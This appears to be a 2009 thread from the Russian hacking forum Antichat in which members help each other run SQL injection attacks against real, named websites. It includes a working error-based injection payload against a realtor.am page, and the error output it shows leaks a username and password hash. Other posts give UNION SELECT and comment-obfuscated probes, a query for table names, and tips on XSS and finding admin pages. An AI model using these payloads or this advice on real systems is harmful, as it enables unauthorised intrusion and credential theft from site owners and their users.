Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
07.11.2009, 21:49
|
|
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020
Репутация:
1423
|
|
FlaktW, выводи данные в ошибку, либо поищи скулю в другом параметре
http://www.realtor.am/newbuilding.php?id=10'+union+select+*+from+(select +*+from+(select+name_const((select+concat_ws(0x2F, username,password)+from+users+limit+0,1),14)d)+as+ t+join+(select+name_const((select+concat_ws(0x2F,u sername,password)+from+users+limit+0,1),14)e)b)a--+
Duplicate column name 'anna/fe4127b4a905160580cca06279f92be7'
Последний раз редактировалось ElteRUS; 07.11.2009 в 21:52..
|
|
|
07.11.2009, 22:05
|
|
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
Провел на форуме:
4358210
Репутация:
2017
|
|
Сообщение от FlaktW
Group by дает 6 полей,но подобрать не удается.Кто нибудь может обьяснить в чем причина.
Заранее всем спасибо.
http://www.realtor.am/newbuilding.php?id=10'+group+by+6%23&lang=en
http://www.realtor.am/newbuilding.php?id=10'+union+select+1,2,3,4,5,6%23 &lang=en
The used SELECT statements have a different number of columns
Проще говоря у тебя Blind sql-inj (слепая скуля)
то есть sql-inj есть но без вывода
https://forum.antichat.ru/thread104591.html
Почитай эту тему для работы с ней
|
|
|
|
07.11.2009, 22:13
|
|
Постоянный
Регистрация: 06.11.2006
Сообщений: 865
Провел на форуме:
1977708
Репутация:
208
|
|
wolmer
Нет, сюда не хочу )) моу в личку кинуть. Но мой цель не взломать его, а тренироватся, хочу сам понимать как все это работает.
Можете помочь?
mr.celt
И что советуешь делать? какие трюки можно выполнить?
|
|
|
|
08.11.2009, 00:08
|
|
Участник форума
Регистрация: 06.02.2008
Сообщений: 110
Провел на форуме:
217423
Репутация:
32
|
|
Сообщение от B1t.exe
И что советуешь делать? какие трюки можно выполнить?
Если хочешь провернуть XSS, то необходимо найти параметры, вывод которых ты можешь видеть, например, то что вводишь в поиске..
Что касатся проверки путей и поиска админки, есть примерно 50 стандартных путей (файлик могу скинуть), вот их и проверяй, если конечно нет какого-либо префикса перед названием.
HAXTA4OK
Как это слепая? А вывод сообщения "The used SELECT statements have a different number of columns".
Последний раз редактировалось mr.celt; 08.11.2009 в 00:13..
|
|
|
|
08.11.2009, 00:42
|
|
Постоянный
Регистрация: 18.02.2008
Сообщений: 368
Провел на форуме:
4075418
Репутация:
386
|
|
Как это слепая? А вывод сообщения "The used SELECT statements have a different number of columns".
а ты видиш принтабильное поле через которое можно вывести данные? мм кстате недавно в хакере писали про вывод данных через ошибки но если неошибась это прокатит только в 5 ветке
|
|
|
|
08.11.2009, 01:44
|
|
Постоянный
Регистрация: 06.11.2006
Сообщений: 865
Провел на форуме:
1977708
Репутация:
208
|
|
mr.celt
а вот как насчет того, что все попытки SQL инекции - открывает стартовая страница?
Насчет XSS - негде проверять, т.к. поиск по сайту нету. единственно где нашел ввести данные - это где пишется письмо (оратный адрес)
|
|
|
|
08.11.2009, 01:48
|
|
Новичок
Регистрация: 07.11.2009
Сообщений: 23
Провел на форуме:
189458
Репутация:
10
|
|
Сообщение от B1t.exe
mr.celt
а вот как насчет того, что все попытки SQL инекции - открывает стартовая страница?
Насчет XSS - негде проверять, т.к. поиск по сайту нету. единственно где нашел ввести данные - это где пишется письмо (оратный адрес)
пробуй:
id=-1/**/unION/**/selECT/**/1,2,3--+
И вообще, читай больше инфи
---
ксс может быть не только в поиске..
|
|
|
|
08.11.2009, 02:11
|
|
Постоянный
Регистрация: 06.11.2006
Сообщений: 865
Провел на форуме:
1977708
Репутация:
208
|
|
пробуй:
id=-1/**/unION/**/selECT/**/1,2,3--+
если пробовать вот так:
http://www.site.ru/ ?id=-1/**/unION/**/selECT/**/1,2,3--+
то открывает гравная страница (ничем не отличается от www.site.ru)
А если просто вот так:
http://www.site.ru/id=-1/**/unION/**/selECT/**/1,2,3--+
то кидает в сайт хостера, с надпесем:
Ошибка доступа 404 к указанной странице
Может тут какой то "супер" технология работает? или какой-то неприступный СУБД ?
|
|
|
|
08.11.2009, 02:14
|
|
Новичок
Регистрация: 07.11.2009
Сообщений: 23
Провел на форуме:
189458
Репутация:
10
|
|
Сообщение от B1t.exe
если пробовать вот так:
http://www.site.ru/?id=-1/**/unION/**/selECT/**/1,2,3--+
то открывает гравная страница (ничем не отличается от www.site.ru)
А если просто вот так:
http://www.welcome-bank.ru/id=-1/**/unION/**/selECT/**/1,2,3--+
то кидает в сайт хостера, с надпесем:
Может тут какой то "супер" технология работает? или какой-то неприступный СУБД ?
блин, я даже не знаю как тебе объяснить 
1) очень быстро перешел на такий сайты
2) читай мануалы!
Тебе в этой теме уже рассказали что читать и делать!
Последний раз редактировалось [Forest]; 08.11.2009 в 02:18..
|
|
|
|
08.11.2009, 04:14
|
|
Участник форума
Регистрация: 01.08.2009
Сообщений: 183
Провел на форуме:
1483264
Репутация:
131
|
|
Делая запрос:
union+select+1,2,3,4,5,6,7,8,9,group_concat(table_ name),11+from+information_schema.tables
Выдаёт
что не так? 
Последний раз редактировалось DeluxeS; 08.11.2009 в 04:26..
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для [Forest]](/avatars/avatar103206.gif){kind=avatar}
Похожие темы
Линейный вид
